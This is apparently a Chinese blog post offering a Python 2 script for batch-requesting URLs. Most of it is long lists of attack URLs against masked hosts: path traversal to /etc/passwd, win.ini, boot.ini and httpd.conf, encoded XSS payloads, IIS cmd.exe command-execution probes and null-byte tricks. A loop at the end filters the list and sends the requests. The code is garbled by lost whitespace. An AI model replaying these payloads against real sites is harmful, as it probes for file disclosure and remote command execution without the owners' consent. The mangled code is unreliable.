python批量请求url_Python 简单批量请求接口实例

#coding:utf-8

'''Created on 2017年11月10日

@author: li.liu'''

importurllibimporttime

str1='''http://source.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://sso.xxxxx.com/../

http://source.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-+AC8-SCRIPT+AD4-.ida

http://www.xxxxx.com/../

http://search.xxxxx.com/search/webSearchNeed?categoryName=%E5%93%81%E7%89%8C

http://source.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://source.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida

http://stylist.xxxxx.com/%3Cscript%3Ealert(1234)%3C/script%3E

http://stylist.xxxxx.com/%3Cscript%3Ealert(1234)%3C/script%3E

http://source.xxxxx.com/index

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://source.xxxxx.com/index%23.%23php

http://sso.xxxxx.com/.nsf/../winnt/win.ini

http://sso.xxxxx.com/%00%00.nsf/../winnt/win.ini

http://sso.xxxxx.com/%00%20.nsf/../winnt/win.ini

http://sso.xxxxx.com/%00%c0%af.nsf/../winnt/win.ini

http://sso.xxxxx.com/%00...nsf/../winnt/win.ini

http://sso.xxxxx.com/%00.nsf//../winnt/win.ini

http://www.xxxxx.com/.nsf/../winnt/win.ini

http://sso.xxxxx.com/%00.nsf/../winnt/win.ini

http://www.xxxxx.com/%00%00.nsf/../winnt/win.ini

http://www.xxxxx.com/%00%20.nsf/../winnt/win.ini

http://sso.xxxxx.com/%00.nsf/..//winnt/win.ini

http://www.xxxxx.com/%00%c0%af.nsf/../winnt/win.ini

http://www.xxxxx.com/%00...nsf/../winnt/win.ini

http://sso.xxxxx.com/%00.nsf/../../winnt/win.ini

http://www.xxxxx.com/%00.nsf//../winnt/win.ini

http://www.xxxxx.com/%00.nsf/../winnt/win.ini

http://sso.xxxxx.com/%00.nsf.nsf/../winnt/win.ini

http://www.xxxxx.com/%00.nsf/..//winnt/win.ini

http://sso.xxxxx.com/%20%00.nsf/../winnt/win.ini

http://search.xxxxx.com/search/webSearchNeed?categoryName=%E5%93%81%E7%89%8C

http://www.xxxxx.com/%00.nsf/../../winnt/win.ini

http://sso.xxxxx.com/%20.nsf//../winnt/win.ini

http://www.xxxxx.com/%00.nsf.nsf/../winnt/win.ini

http://sso.xxxxx.com/%20.nsf/..//winnt/win.ini

http://www.xxxxx.com/%20%00.nsf/../winnt/win.ini

http://sso.xxxxx.com/%c0%af%00.nsf/../winnt/win.ini

http://stylist.xxxxx.com/../

http://sso.xxxxx.com/%c0%af.nsf//../winnt/win.ini

http://source.xxxxx.com/*.jsp/

http://www.xxxxx.com/%20.nsf//../winnt/win.ini

http://sso.xxxxx.com:443

http://sso.xxxxx.com/%c0%af.nsf/..//winnt/win.ini

http://www.xxxxx.com/%20.nsf/..//winnt/win.ini

http://www.xxxxx.com/%c0%af%00.nsf/../winnt/win.ini

http://www.xxxxx.com/%c0%af.nsf//../winnt/win.ini

http://www.xxxxx.com/%c0%af.nsf/..//winnt/win.ini

http://www.xxxxx.com/...nsf//../winnt/win.ini

http://source.xxxxx.com:8080/C:%5Cwinnt%5Cwin.ini

http://www.xxxxx.com/...nsf/..//winnt/win.ini

http://sso.xxxxx.com/...nsf//../winnt/win.ini

http://sso.xxxxx.com/...nsf/..//winnt/win.ini

http://sso.xxxxx.com/.nsf///../winnt/win.ini

http://sso.xxxxx.com/.nsf//../winnt/win.ini

http://sso.xxxxx.com/.nsf//..//winnt/win.ini

http://www.xxxxx.com/.nsf///../winnt/win.ini

http://www.xxxxx.com:443

http://search.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://search.xxxxx.com:8080/C:%5Cwinnt%5Cwin.ini

http://search.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-+AC8-SCRIPT+AD4-.ida

http://search.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://search.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida

http://stylist.xxxxx.com/.nsf/../winnt/win.ini

http://sso.xxxxx.com/.nsf/../winnt/win.ini

http://stylist.xxxxx.com/%00%00.nsf/../winnt/win.ini

http://sso.xxxxx.com/.nsf/..//winnt/win.ini

http://stylist.xxxxx.com/%00%20.nsf/../winnt/win.ini

http://sso.xxxxx.com/.nsf/..///winnt/win.ini

http://sso.xxxxx.com/.nsf%00.nsf/../winnt/win.ini

http://stylist.xxxxx.com/%00%c0%af.nsf/../winnt/win.ini

http://sso.xxxxx.com/.nsf.nsf//../winnt/win.ini

http://stylist.xxxxx.com/%00...nsf/../winnt/win.ini

http://sso.xxxxx.com/.nsf.nsf/..//winnt/win.ini

http://sso.xxxxx.com/.nsf/../winnt/win.ini

http://stylist.xxxxx.com/%00.nsf//../winnt/win.ini

http://sso.xxxxx.com/.nsf/..//winnt/win.ini

http://stylist.xxxxx.com/%00.nsf/../winnt/win.ini

http://sso.xxxxx.com/.nsf/..///winnt/win.ini

http://sso.xxxxx.com/.nsf%00.nsf/../winnt/win.ini

http://stylist.xxxxx.com/%00.nsf/..//winnt/win.ini

http://sso.xxxxx.com/.nsf.nsf//../winnt/win.ini

http://stylist.xxxxx.com/%00.nsf/../../winnt/win.ini

http://sso.xxxxx.com/.nsf.nsf/..//winnt/win.ini

http://source.xxxxx.com/

http://sso.xxxxx.com//

http://stylist.xxxxx.com/%00.nsf.nsf/../winnt/win.ini

http://www.xxxxx.com//

http://search.xxxxx.com/index

http://stylist.xxxxx.com/%20%00.nsf/../winnt/win.ini

http://search.xxxxx.com/index%23.%23php

http://www.xxxxx.com/.nsf//../winnt/win.ini

http://stylist.xxxxx.com:443

http://stylist.xxxxx.com/%20.nsf//../winnt/win.ini

http://www.xxxxx.com/.nsf//..//winnt/win.ini

http://www.xxxxx.com/.nsf/../winnt/win.ini

http://www.xxxxx.com/.nsf/..//winnt/win.ini

http://www.xxxxx.com/.nsf/..///winnt/win.ini

http://www.xxxxx.com/.nsf%00.nsf/../winnt/win.ini

http://sso.xxxxx.com/sso/pc-login

http://www.xxxxx.com/.nsf.nsf//../winnt/win.ini

http://sso.xxxxx.com/sso/NonExistentFile

http://www.xxxxx.com/

http://www.xxxxx.com/.nsf.nsf/..//winnt/win.ini

http://www.xxxxx.com/.nsf/../winnt/win.ini

http://stylist.xxxxx.com/%20.nsf/..//winnt/win.ini

http://stylist.xxxxx.com/%c0%af%00.nsf/../winnt/win.ini

http://stylist.xxxxx.com/%c0%af.nsf//../winnt/win.ini

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/.nsf/..//winnt/win.ini

http://www.xxxxx.com/.nsf/..///winnt/win.ini

http://search.xxxxx.com/*.jsp/

http://stylist.xxxxx.com//

http://www.xxxxx.com/.nsf%00.nsf/../winnt/win.ini

http://source.xxxxx.com/c/winnt/system32/cmd.exe?/c+dir

http://www.xxxxx.com/.nsf.nsf//../winnt/win.ini

http://sso.xxxxx.com:8080/C:%5Cboot.ini

http://www.xxxxx.com:8080/C:%5Cboot.ini

http://www.xxxxx.com/.nsf.nsf/..//winnt/win.ini

http://search.xxxxx.com/

http://stylist.xxxxx.com/html/pingtaisheji.html

http://stylist.xxxxx.com/html/NonExistentFile.html

http://source.xxxxx.com/d/winnt/system32/cmd.exe?/c+dir

http://sso.xxxxx.com/sso/pc-login

http://www.xxxxx.com/

http://stylist.xxxxx.com/%c0%af.nsf/..//winnt/win.ini

http://stylist.xxxxx.com/...nsf//../winnt/win.ini

http://stylist.xxxxx.com/...nsf/..//winnt/win.ini

http://stylist.xxxxx.com/.nsf///../winnt/win.ini

http://stylist.xxxxx.com/.nsf//../winnt/win.ini

http://stylist.xxxxx.com/.nsf//..//winnt/win.ini

http://stylist.xxxxx.com/.nsf/../winnt/win.ini

http://stylist.xxxxx.com:8080/C:%5Cboot.ini

http://stylist.xxxxx.com/.nsf/..//winnt/win.ini

http://source.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://source.xxxxx.com/\../\../\../\../\../\../\../etc/httpd/conf/httpd.conf

http://source.xxxxx.com/\../\../\../\../\../\../\../www/conf/httpd.conf

http://sso.xxxxx.com/sso/pc-login

http://www.xxxxx.com/

http://search.xxxxx.com/c/winnt/system32/cmd.exe?/c+dir

http://stylist.xxxxx.com/.nsf/..///winnt/win.ini

http://stylist.xxxxx.com/html/pingtaisheji.html

http://stylist.xxxxx.com/.nsf%00.nsf/../winnt/win.ini

http://stylist.xxxxx.com/.nsf.nsf//../winnt/win.ini

http://stylist.xxxxx.com/.nsf.nsf/..//winnt/win.ini

http://stylist.xxxxx.com/.nsf/../winnt/win.ini

http://stylist.xxxxx.com/.nsf/..//winnt/win.ini

http://stylist.xxxxx.com/.nsf/..///winnt/win.ini

http://stylist.xxxxx.com/.nsf%00.nsf/../winnt/win.ini

http://stylist.xxxxx.com/.nsf.nsf//../winnt/win.ini

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://stylist.xxxxx.com/.nsf.nsf/..//winnt/win.ini

http://source.xxxxx.com:8080/%20..\%20..\%20..\%20..\%20..\%20..\%20..\winnt\win.ini

http://sso.xxxxx.com/sso/pc-login

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://search.xxxxx.com/d/winnt/system32/cmd.exe?/c+dir

http://stylist.xxxxx.com/html/pingtaisheji.html

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://source.xxxxx.com:8080/%20

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://sso.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://sso.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-+AC8-SCRIPT+AD4-.ida

http://sso.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://sso.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida

http://www.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://www.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-+AC8-SCRIPT+AD4-.ida

http://www.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://search.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://www.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida

http://search.xxxxx.com/\../\../\../\../\../\../\../etc/httpd/conf/httpd.conf

http://stylist.xxxxx.com/html/pingtaisheji.html

http://search.xxxxx.com/\../\../\../\../\../\../\../www/conf/httpd.conf

http://sso.xxxxx.com/index

http://sso.xxxxx.com/index%23.%23php

http://www.xxxxx.com/index

http://www.xxxxx.com/index%23.%23php

http://search.xxxxx.com:8080/%20..\%20..\%20..\%20..\%20..\%20..\%20..\winnt\win.ini

http://stylist.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://stylist.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-+AC8-SCRIPT+AD4-.ida

http://stylist.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://stylist.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida

http://sso.xxxxx.com/*.jsp/

http://www.xxxxx.com/*.jsp/

http://search.xxxxx.com:8080/%20

http://stylist.xxxxx.com/index

http://sso.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://stylist.xxxxx.com/*.jsp/

http://stylist.xxxxx.com/

http://sso.xxxxx.com/c/winnt/system32/cmd.exe?/c+dir

http://stylist.xxxxx.com/index%23.%23php

http://www.xxxxx.com/c/winnt/system32/cmd.exe?/c+dir

http://source.xxxxx.com/sourcePc/news

http://sso.xxxxx.com/d/winnt/system32/cmd.exe?/c+dir

http://sso.xxxxx.com:8080/C:%5Cwinnt%5Cwin.ini

http://www.xxxxx.com:8080/C:%5Cwinnt%5Cwin.ini

http://www.xxxxx.com/d/winnt/system32/cmd.exe?/c+dir

http://stylist.xxxxx.com/c/winnt/system32/cmd.exe?/c+dir

http://sso.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://sso.xxxxx.com/\../\../\../\../\../\../\../etc/httpd/conf/httpd.conf

http://stylist.xxxxx.com:8080/C:%5Cwinnt%5Cwin.ini

http://sso.xxxxx.com/\../\../\../\../\../\../\../www/conf/httpd.conf

http://www.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://www.xxxxx.com/\../\../\../\../\../\../\../etc/httpd/conf/httpd.conf

http://www.xxxxx.com/\../\../\../\../\../\../\../www/conf/httpd.conf

http://stylist.xxxxx.com/d/winnt/system32/cmd.exe?/c+dir

http://sso.xxxxx.com:8080/%20..\%20..\%20..\%20..\%20..\%20..\%20..\winnt\win.ini

http://www.xxxxx.com:8080/%20..\%20..\%20..\%20..\%20..\%20..\%20..\winnt\win.ini

http://search.xxxxx.com/search/webSearchNeed?categoryName=%E5%93%81%E7%89%8C

http://stylist.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://stylist.xxxxx.com/\../\../\../\../\../\../\../etc/httpd/conf/httpd.conf

http://stylist.xxxxx.com/\../\../\../\../\../\../\../www/conf/httpd.conf

http://source.xxxxx.com/sourcePc/news

http://www.xxxxx.com/

http://www.xxxxx.com/

http://www.xxxxx.com/

http://sso.xxxxx.com:8080/%20

http://www.xxxxx.com/'''str2='''http://sso.xxxxx.com:8080/%20

http://sso.xxxxx.com/*.jsp/

http://search.xxxxx.com/*.jsp/

http://www.xxxxx.com:8080/C:%5Cboot.ini

http://sso.xxxxx.com:443

http://stylist.xxxxx.com/html/NonExistentFile.html

http://search.xxxxx.com/index%23.%23php

http://source.xxxxx.com:8080/%20

http://source.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://search.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://www.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://www.xxxxx.com:443

http://stylist.xxxxx.com/index

http://sso.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://stylist.xxxxx.com/index%23.%23php

http://stylist.xxxxx.com/*.jsp/

http://sso.xxxxx.com/../

http://search.xxxxx.com/search/webSearchNeed?categoryName=%E5%93%81%E7%89%8C

http://stylist.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://sso.xxxxx.com/index%23.%23php

http://stylist.xxxxx.com:443

http://www.xxxxx.com/../

http://stylist.xxxxx.com/../

http://source.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://source.xxxxx.com/sourcePc/news

http://www.xxxxx.com//

http://stylist.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://www.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://www.xxxxx.com/index%23.%23php

http://search.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://sso.xxxxx.com/index

http://search.xxxxx.com:8080/%20

http://search.xxxxx.com/index

http://sso.xxxxx.com:8080/C:%5Cboot.ini

http://stylist.xxxxx.com/%3Cscript%3Ealert(1234)%3C/script%3E

http://source.xxxxx.com/

http://stylist.xxxxx.com/html/pingtaisheji.html

http://search.xxxxx.com/

http://stylist.xxxxx.com/

http://www.xxxxx.com/

http://stylist.xxxxx.com:8080/C:%5Cboot.ini

http://stylist.xxxxx.com//

http://sso.xxxxx.com/sso/NonExistentFile

http://www.xxxxx.com/

http://sso.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://sso.xxxxx.com/

http://www.xxxxx.com/index

http://sso.xxxxx.com//

http://sso.xxxxx.com/sso/pc-login

http://www.xxxxx.com/*.jsp/

http://source.xxxxx.com/*.jsp/

http://source.xxxxx.com/index%23.%23php

http://source.xxxxx.com/index'''str3='''http://sso.xxxxx.com:8080/%20

http://sso.xxxxx.com/*.jsp/

http://search.xxxxx.com/*.jsp/

http://sso.xxxxx.com:443

http://stylist.xxxxx.com/html/NonExistentFile.html

http://search.xxxxx.com/index%23.%23php

http://source.xxxxx.com:8080/%20

http://source.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://search.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://www.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://www.xxxxx.com:443

http://stylist.xxxxx.com/index

http://sso.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://stylist.xxxxx.com/index%23.%23php

http://stylist.xxxxx.com/*.jsp/

http://sso.xxxxx.com/../

http://search.xxxxx.com/search/webSearchNeed?categoryName=%E5%93%81%E7%89%8C

http://stylist.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://search.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://sso.xxxxx.com/index%23.%23php

http://stylist.xxxxx.com:443

http://www.xxxxx.com/../

http://stylist.xxxxx.com/../

http://source.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://source.xxxxx.com/sourcePc/news

http://www.xxxxx.com//

http://source.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://stylist.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://stylist.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://www.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://www.xxxxx.com/index%23.%23php

http://www.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://search.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''

http://sso.xxxxx.com/index

http://search.xxxxx.com:8080/%20

http://search.xxxxx.com/index

http://stylist.xxxxx.com/%3Cscript%3Ealert(1234)%3C/script%3E

http://source.xxxxx.com/

http://sso.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://stylist.xxxxx.com/html/pingtaisheji.html

http://search.xxxxx.com/

http://stylist.xxxxx.com/

http://www.xxxxx.com/

http://stylist.xxxxx.com//

http://sso.xxxxx.com/sso/NonExistentFile

http://www.xxxxx.com/

http://sso.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''

http://sso.xxxxx.com/

http://www.xxxxx.com/index

http://sso.xxxxx.com//

http://sso.xxxxx.com/sso/pc-login

http://www.xxxxx.com/*.jsp/

http://source.xxxxx.com/*.jsp/

http://source.xxxxx.com/index%23.%23php

http://source.xxxxx.com/index'''str4='''http://search.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://sso.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://source.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://www.xxxxx.com/\../\../\../\../\../\../\../etc/passwd

http://stylist.xxxxx.com/\../\../\../\../\../\../\../etc/passwd'''str5='''http://search.xxxxx.com/\../\../\../\../\../\../\../etc/passwd'''t=0

a= str4.split('\n')#print urllib.urlopen('http://www.baidu.com').code

s=set()for i ina:if '.ida' in i or 'win.ini' in i or 'httpd.conf' in i or 'c+dir' in i :#or 'passwd' in i:

pass

#s.add(i)

elif 'passwd' ini:#pass

s.add(i)else:pass

#s.add(i)

#while True:

for j ins:

t+=1

#print len(s),'/',t

printjtry:

url=jprinturllib.urlopen(url).codeexcept:print urllib.urlopen('http://www.xxxxx.com/').code#time.sleep(20)

''''''

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值